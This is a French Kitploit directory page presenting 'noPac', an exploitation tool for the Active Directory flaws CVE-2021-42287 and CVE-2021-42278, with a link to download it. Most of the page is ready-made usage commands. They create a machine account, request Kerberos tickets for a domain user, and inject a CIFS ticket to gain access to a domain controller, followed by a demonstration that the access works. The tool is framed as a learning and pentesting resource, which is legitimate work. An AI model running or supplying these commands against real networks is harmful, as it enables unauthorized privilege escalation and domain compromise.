Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
noPac — Exploiteur pour CVE-2021-42287/CVE-2021-42278 | Kitploit
Outils/GitHubGitHub/trya9ain/nopac
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'Intrusion
GitHubtrya9ain/nopac

noPac

Exploiteur pour CVE-2021-42287/CVE-2021-42278

Voir le dépôt
141il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

noPac

L'origine de ce projet est l'apprentissage du principe de noPac. J'ai apporté quelques modifications sur la base du projet cube0x0. Des commentaires personnels de compréhension ont été ajoutés au code source.

  • Suppression de la fonction Scan, je trouve personnellement que la fonction Scan est plutôt inutile.
  • Ajout de la vérification de la valeur MachineAccountQuota, si elle est à 0, le programme se termine.
  • Optimisation du traitement de la vérification lors de l'ajout d'un compte machine.
  • Ajout de la sortie du TGT.

L'article d'analyse de la vulnérabilité peut être consulté sur mon blog : Analyse noPac

Conditions d'exploitation

noPac est une combinaison de deux vulnérabilités : CVE-2021-42278 (usurpation de sAMAccountName) et CVE-2021-42287 (tromperie du KDC). Il ne peut être exploité avec succès que si les conditions d'exploitation des deux vulnérabilités sont simultanément remplies.

Utilisation

root@kitploit:~
Examples: Get TGT and ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Examples: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

La méthode la plus courante est PTT :

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Démonstration

Avant d'utiliser noPac, pas d'accès au DC.

Utiliser noPac.

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Après PTT, on peut accéder à nouveau au DC dans la fenêtre actuelle avec succès.

Environnement d'exploitation

Note : le programme ne peut fonctionner que sur des machines avec .NET 4.0 ou supérieur. Windows Server 2012 est livré avec .NET 4.0 par défaut, Windows Server 2008 avec .NET 3.5.

Voir la version de .NET présente sur la machine :

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

Télécharger l’outil